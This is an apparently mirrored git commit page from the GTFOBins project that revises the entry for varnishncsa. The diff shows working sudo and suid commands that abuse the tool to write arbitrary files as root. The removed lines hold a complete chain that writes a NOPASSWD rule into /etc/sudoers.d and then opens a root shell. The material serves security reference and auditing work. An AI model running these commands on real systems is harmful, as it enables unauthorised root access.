mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Polish varnishncsa
This commit is contained in:
parent
0190295ed2
commit
efaf1b11e8
@ -1,8 +1,18 @@
|
|||||||
---
|
---
|
||||||
description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format.
|
description: |
|
||||||
|
This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
|
||||||
|
|
||||||
|
```
|
||||||
|
curl -H 'yyy: DATA' http://localhost:6081/xxx
|
||||||
|
```
|
||||||
|
description:
|
||||||
functions:
|
functions:
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user &
|
code: |
|
||||||
- code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo
|
LFILE=file_to_write
|
||||||
- code: sudo bash
|
sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
|
||||||
|
suid:
|
||||||
|
code: |
|
||||||
|
LFILE=file_to_write
|
||||||
|
./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
|
||||||
---
|
---
|
Loading…
Reference in New Issue
Block a user